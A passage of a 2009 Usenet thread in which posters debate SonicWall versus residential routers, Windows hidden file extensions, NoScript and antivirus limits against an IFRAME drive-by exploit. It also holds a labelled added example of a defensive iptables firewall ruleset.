using Foxit on Windows - it's incredible how much faster and lighter it
is than Acrobat).

I'd also like to point out that it is problems like this that make
Outlook Express and Outlook such a bad choice for an email program on
Windows. Not only do they use IE to display html emails, but they fetch
such external links automatically. The main issue is a privacy one -
spam often has links to images that are fetched from external servers,
which then lets the server know that the spammed address is correct, and
that someone is reading it. But if you have a bug in your jpeg
libraries, this can also be a security issue. Thunderbird, on the other
hand, will not load such external images unless you explicitly ask it to.

ToddAndMargo
May 10, 2009, 10:35:33 PM
David Brown wrote:

> That's a nasty security hole! It also shows that Linux systems are not
> impervious to malware (though they are *much* safer, and certainly don't
> need anti-virus software and all the other "security" junk windows users
> often believe helps).

Here is a link that nicely backs up your statement. It is the
test results on various Anti Viruses.

http://www.anti-malware-test.com/

Note the best you can get is 61% without a lot of false positives.
Yikes!

-T

Mark Hobley
May 11, 2009, 5:08:02 AM
ToddAndMargo <ToddAn...@nospam.verizon.net> wrote:
> NAT can be spoofed

I think even the cheap boxes have anti-spoofing facilities built in.

One of the differences between a traditional router and a firewall router is
to do with the way that UDP is forwarded. A traditional NAT router will
forward UDP reply packets on non-forwarded ports to an associated host and
there is no facility within the router to control this. A firewall router
provides the additional control facilities.

Mark.

--
Mark Hobley
Linux User: #370818 http://markhobley.yi.org/
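
The control Mark describes (a stateful firewall deciding which UDP replies get back in) together with the anti-spoofing Todd asked about, expressed as iptables rules for a Linux box. This is an added example, not from the thread: it prints a ruleset in iptables-restore format and assumes WAN on eth0, LAN on eth1, LAN subnet 192.168.1.0/24 and a constructed LAN host 192.168.1.10 for the port forward.

```shell
#!/bin/sh
# Added example, not from the thread: print a stateful iptables ruleset
# (iptables-restore format) for a Linux box acting as a firewall router.
# Assumed: WAN on eth0, LAN on eth1, LAN subnet 192.168.1.0/24 and a
# constructed LAN host 192.168.1.10 for the port-forward rule.
# Apply with: gen_ruleset eth0 eth1 192.168.1.0/24 | iptables-restore
gen_ruleset() {
    wan=${1:-eth0}
    lan=${2:-eth1}
    lan_net=${3:-192.168.1.0/24}
    fwd_host=192.168.1.10
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
# Anti-spoofing: a packet arriving from the WAN must not carry a LAN source.
-A INPUT -i $wan -s $lan_net -j DROP
-A FORWARD -i $wan -s $lan_net -j DROP
# Stateful core: only traffic belonging to a connection the LAN opened is
# let back in (conntrack also tracks UDP "replies"); NEW from the WAN is not.
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i $wan -m conntrack --ctstate NEW -j DROP
-A INPUT -i $lan -j ACCEPT
-A FORWARD -m conntrack --ctstate INVALID -j DROP
-A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# This is the control a plain NAT box lacks: a UDP reply is forwarded only
# if the LAN created the entry, and here only DNS (53) and NTP (123) may.
-A FORWARD -i $lan -o $wan -p udp -m multiport --dports 53,123 -m conntrack --ctstate NEW -j ACCEPT
-A FORWARD -i $lan -o $wan -p tcp -m conntrack --ctstate NEW -j ACCEPT
# Explicit port forward (TCP/22 to $fwd_host); the DNAT below rewrites first.
-A FORWARD -i $wan -o $lan -p tcp -d $fwd_host --dport 22 -m conntrack --ctstate NEW -j ACCEPT
COMMIT
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -i $wan -p tcp --dport 22 -j DNAT --to-destination $fwd_host:22
-A POSTROUTING -o $wan -s $lan_net -j MASQUERADE
COMMIT
EOF
}
```

An inbound UDP packet on a port no LAN host used matches no conntrack entry and falls to the DROP policy, which is exactly the behaviour Mark contrasts with a plain NAT router.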

1PW

May 11, 2009, 7:32:10 AM
On 05/08/2009 05:21 AM, Thad Floryan sent:

Hello Thad:

I appreciate the thoughtful rebuttal. Your good experience has
obviously made you a supporter. Even at about $300, it's hard for /me/
to justify the outlay for the TZ-180. Particularly when other
residential grade routers are as inexpensive as they are.

I apologize for incomplete research. However, can a "registered" user
expect any kind of ongoing software support for a TZ-180 even though
they haven't yet purchased a 10-node license?

Thank you,

Thad Floryan

May 11, 2009, 9:34:26 AM
On May 11, 4:32 am, 1PW <barcrnahgjuvf...@nby.pbz> wrote:
> On 05/08/2009 05:21 AM, Thad Floryan sent:
> [...]

> > Product longevity, reliability and low cost per year are big pluses.
> > It's truly a plug'n'play appliance. Mine's been up for 117 days now
> > and that's only because my local cable provider was offline for awhile
> > one evening back in February when they switched over to DOCSIS 3.0
> > and I didn't know what happened so I cycled the TZ-170; it normally
> > will stay up for years because mine is on a UPS.
>
> Hello Thad:
>
> I appreciate the thoughtful rebuttal. Your good experience has
> obviously made you a supporter. Even at about $300, it's hard for /me/
> to justify the outlay for the TZ-180. Particularly when other
> residential grade routers are as inexpensive as they are.

You get what you pay for. For a revealing look at how vulnerable the
"residential grade routers" really are:

<http://www.sourcesec.com/Lab/soho_router_report.pdf>

and that's just the tip of the iceberg. I see those and similar
problems all the time. And even some "pro" devices have more than
their share of problems and vulnerabilities (think IOS from a bug,
er, big name in Internet hardware :-)

I simply haven't seen those kinds of problems with the Sonicwall
devices in the 17 years I've been using them, and I've personally
installed 100s at client sites over the years and I've never had a
client's site compromised. Ever.

> I apologize for incomplete research. However, can a "registered" user
> expect any kind of ongoing software support for a TZ-180 even though
> they haven't yet purchased a 10-node license?

The 10-node license is part of the basic unit. Back in the "old days"
Sonicwall provided lifetime software support, but as the company grew
and "bean counters" infiltrated the company, they went to the present
pricing scam, er, scheme similar to what 1000s of other companies do.
Their policy is here: <http://www.sonicwall.com/us/support/3003.html>

The hue and cry when they dropped the "lifetime" still leaves my ears
ringing after 6 or 7 years now.

FWIW, the basic software in the appliance is rock solid and I haven't
seen any need to get onto a support contract for my purposes. Most of
the updates and such are new features primarily for accounting and some
other things that have nothing whatsoever to do with the primary purpose
of the product: being an excellent firewall (and NAT and DMZ etc.
device). That's why it costs ~ US$300 and not the US$50 of the typical
"residential grade router". It does a lot more than "just" routing and
firewalling, and I've had to buy only two Sonicwall devices for myself
in 17 years -- the upgrade to the TZ-170 was to accommodate higher WAN
speeds. 100BaseTX didn't even exist when I bought my first Sonicwall
appliance. :-)

David Brown

May 11, 2009, 10:14:34 AM
Thad Floryan wrote:
> On May 11, 4:32 am, 1PW <barcrnahgjuvf...@nby.pbz> wrote:
>> On 05/08/2009 05:21 AM, Thad Floryan sent:
>> [...]
>>> Product longevity, reliability and low cost per year are big pluses.
>>> It's truly a plug'n'play appliance. Mine's been up for 117 days now
>>> and that's only because my local cable provider was offline for awhile
>>> one evening back in February when they switched over to DOCSIS 3.0
>>> and I didn't know what happened so I cycled the TZ-170; it normally
>>> will stay up for years because mine is on a UPS.
>> Hello Thad:
>>
>> I appreciate the thoughtful rebuttal. Your good experience has
>> obviously made you a supporter. Even at about $300, it's hard for /me/
>> to justify the outlay for the TZ-180. Particularly when other
>> residential grade routers are as inexpensive as they are.
>
> You get what you pay for. For a revealing look at how vulnerable the
> "residential grade routers" really are:
>
> <http://www.sourcesec.com/Lab/soho_router_report.pdf>
>

These attacks are either by malicious users on the *inside* of the
network, or simply weak passwords or WLAN encryption. Using a good WLAN
encryption and password is always important - you need to configure that
for any firewall/router. But for devices at this level, vulnerabilities
from the inside are totally irrelevant to security.

If you *do* need to protect from malicious people on the inside, you
have far bigger problems than your firewall, and no SonicWall, Cisco, or
any other standard device at any price is going to do the job - you need
a network expert, not an off-the-shelf solution.


> and that's just the tip of the iceberg. I see those and similar
> problems all the time. And even some "pro" devices have more than
> their share of problems and vulnerabilities (think IOS from a bug,
> er, big name in Internet hardware :-)
>
> I simply haven't seen those kinds of problems with the Sonicwall
> devices in the 17 years I've been using them, and I've personally
> installed 100s at client sites over the years and I've never had a
> client's site compromised. Ever.
>

*No one* sees these problems (other than the weak encryption and
passwords) in real life - they are hypothetical and require
knowledgeable and malicious attackers on the inside. In networks where
that is realistic (such as at universities), you have experts running
the security, and they don't use ready-made ready-configured firewalls.

I've seen SonicWalls in use. They work fine, and do a good job - but
are pretty expensive for what they do. I personally would not recommend
a firewall/router that had some artificial limit on the number of nodes
or users (and I certainly wouldn't consider "cheating" to get round
these limits - if you think the functionality is worth paying for,
pay for it). And I wouldn't recommend a system that required annual
fees to keep working (paying annually for support is fair enough,
obviously).

If you really need something better than a cheapo firewall/router, then
get a slightly more expensive one - SonicWall is one option, as are
Zyxel, LinkSys, and a host of other options. *None* are significantly
more secure than the others, in that *all* do a perfectly good job of
keeping out packets from the outside. They vary in speed, features,
configuration interfaces, etc. For some uses, additional features such
as accountancy and user management are worth paying for - though they
have nothing to do with security.

If you want more than that, get a Linux box and learn iptables. I can
set up my LinkSys WRT54GL to something more flexible and at least as
secure as anything you can buy from SonicWall at any price - because I
run Linux on it and control it myself.

clay

May 11, 2009, 12:49:59 PM
David Brown wrote:
>...

>
> Ensure that the "hide extensions of known file types" option is off for
> *all* directories.
> ...

[for those who weren't aware]
Even with this option (de)selected*, Windows still hides extensions.
Some that are executable.
.pif, .shs, .lnk, etc. are still hidden.

To actually show _all_ extensions, remove the registry entries:
NeverShowExt
There's a bunch of them.

All useless warnings about messing in the registry apply.
Google it first and learn more.

*That it's not *off* by default is proof that Microsoft cares little
about security.

David Brown

May 11, 2009, 3:39:54 PM
clay wrote:
> David Brown wrote:
>> ...
>>
>> Ensure that the "hide extensions of known file types" option is off
>> for *all* directories.
>> ...
>
> [for those who weren't aware]
> Even with this option (de)selected*, Windows still hides extensions.
> Some that are executable.
> .pif, .shs, .lnk, etc. are still hidden.
>
> To actually show _all_ extensions, remove the registry entries:
> NeverShowExt
> There's a bunch of them.
>

I knew these were still hidden - I didn't know it was possible to show
them. Thanks for the tip!

Thad Floryan

May 11, 2009, 8:06:53 PM
On May 11, 7:14 am, David Brown
<david.br...@hesbynett.removethisbit.no> wrote:
> Thad Floryan wrote:
> [...]

> > <http://www.sourcesec.com/Lab/soho_router_report.pdf>
>
> These attacks are either by malicious users on the *inside* of the
> network, or simply weak passwords or WLAN encryption. Using a good WLAN
> encryption and password is always important - you need to configure that
> for any firewall/router. But for devices at this level, vulnerabilities
> from the inside are totally irrelevant to security.
>
> If you *do* need to protect from malicious people on the inside, you
> have far bigger problems than your firewall, and no SonicWall, Cisco, or
> any other standard device at any price is going to do the job - you need
> a network expert, not an off-the-shelf solution.
> [...]

For sure. :-)

We're getting a wee bit off-topic for this forum -- this discussion
should be in comp.os.linux.security.

Do note that attacks seemingly originating on the inside (LAN) can
be silently initiated by malware on the outside (WAN) thanks to Java,
ActiveX, and other scripting on visited web sites such as the IFRAME
exploit I mentioned several days ago.

For the few Windows systems I do have, the Firefox plugin NoScript
stops such malware dead. NoScript provides examination of what it
finds and permits (un)conditional continuation or total blocking.

What I found interesting fixing the IFRAME exploit for several
people (using Win boxes) was that AVG is the only AV program that
blocks web sites with the IFRAME exploit due to its methodology
which apparently differs from that of Norton/Symantec, McAfee, etc.

I found the IFRAME exploit clever because the silently downloaded
malware from China changes several times a day which is very
problematic for AV programs seeking invariant "signatures".

David Brown

May 12, 2009, 5:57:15 PM
Thad Floryan wrote:
> On May 11, 7:14 am, David Brown
> <david.br...@hesbynett.removethisbit.no> wrote:
>> Thad Floryan wrote:
>> [...]
>>> <http://www.sourcesec.com/Lab/soho_router_report.pdf>
>> These attacks are either by malicious users on the *inside* of the
>> network, or simply weak passwords or WLAN encryption. Using a good WLAN
>> encryption and password is always important - you need to configure that
>> for any firewall/router. But for devices at this level, vulnerabilities
>> from the inside are totally irrelevant to security.
>>
>> If you *do* need to protect from malicious people on the inside, you
>> have far bigger problems than your firewall, and no SonicWall, Cisco, or
>> any other standard device at any price is going to do the job - you need
>> a network expert, not an off-the-shelf solution.
>> [...]
>
> For sure. :-)
>
> We're getting a wee bit off-topic for this forum -- this discussion
> should be in comp.os.linux.security.
>

Or possibly comp.os.windows.security, if such an oxymoronic newsgroup
exists...

> Do note that attacks seemingly originating on the inside (LAN) can
> be silently initiated by malware on the outside (WAN) thanks to Java,
> ActiveX, and other scripting on visited web sites such as the IFRAME
> exploit I mentioned several days ago.
>

In most cases, the target is on the inside too - the main reason to
attack firewalls and routers is to break in. If your code is already
running on a PC on the lan, the only real reason for attacking the
firewall is to open a few ports (rather than having to have the zombie
PC make contact with external servers). If you have UPnP running on the
firewall/router (as many do by default), then there is no need to attack
it - you can open ports just by asking nicely.

> For the few Windows systems I do have, the Firefox plugin NoScript
> stops such malware dead. NoScript provides examination of what it
> finds and permits (un)conditional continuation or total blocking.
>

NoScript is useful if you are visiting dangerous areas of the Internet
underworld, but normally javascript is fairly safe on Firefox. Firefox
will not automatically download and run executable files, and its
javascript (and java) is sandboxed. It is also regularly updated, and
updates don't need reboots or "windows genuine advantage" nonsense,
don't muck up the rest of your system, and don't get saved up for a once
a month update, unlike certain other well-known windows browsers. I
don't mean to say that browsing with Firefox and javascript is risk-free
- no graphics browser is (remember when there was a security flaw in the
jpeg libraries in windows?). But it is low risk for normal use.

> What I found interesting fixing the IFRAME exploit for several
> people (using Win boxes) was that AVG is the only AV program that
> blocks web sites with the IFRAME exploit due to its methodology
> which apparently differs from that of Norton/Symantec , McAfee, etc.
>
> I found the IFRAME exploit clever because the silently downloaded
> malware from China changes several times a day which is very
> problematic for AV programs seeking invariant "signatures".

That's (one reason) why AV programs are only of limited use, and can't
be relied upon. I only ever use AV software (Clam) for email scanning
and occasional off-line scans.
